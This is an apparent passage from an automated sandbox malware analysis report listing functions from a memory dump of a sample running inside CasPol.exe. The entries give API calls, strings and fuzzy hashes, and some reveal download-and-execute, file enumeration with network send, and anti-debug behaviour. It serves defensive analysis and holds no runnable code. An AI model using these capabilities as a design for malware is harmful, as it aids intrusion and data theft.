Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399

Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A

Strings

SETTINGS, xrefs: 0041A653

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59

Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
IsValidCodePage.KERNEL32(00000000), ref: 0045152E
IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69

Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407A91
FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99

Function 0044801F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
_free.LIBCMT ref: 00448077

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 00448243

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58

Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0040627F, 004063A7
open, xrefs: 0040622E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
API String ID: 2825088817-4197237851
Opcode ID: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
Opcode Fuzzy Hash: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B

Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

x@G, xrefs: 00406BC0
x@G, xrefs: 00406AFD

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: x@G$x@G
API String ID: 4113138495-3390264752
Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B

Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C

Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714

Strings

WallpaperStyle, xrefs: 0041BBC7, 0041BBFA, 0041BC4A
TileWallpaper, xrefs: 0041BC66
Control Panel\Desktop, xrefs: 0041BBC2, 0041BBF5, 0041BC45

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF

Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
_wcschr.LIBVCRUNTIME ref: 00450C01
_wcschr.LIBVCRUNTIME ref: 00450C0F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769

Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408DAC
FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileFind$FirstH_prologNext
String ID:
API String ID: 301083792-0
Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98

Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58

Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49

Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
ExitProcess.KERNEL32 ref: 0044259E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88

Function 0044D5F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044D78C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54

Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA

Strings

GetLocaleInfoEx, xrefs: 004475B8, 004475C2

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E

Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759

Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744

Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8

Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604

Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB

EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49

Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754

Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
Instruction Fuzzy Hash:

Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0044E93E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
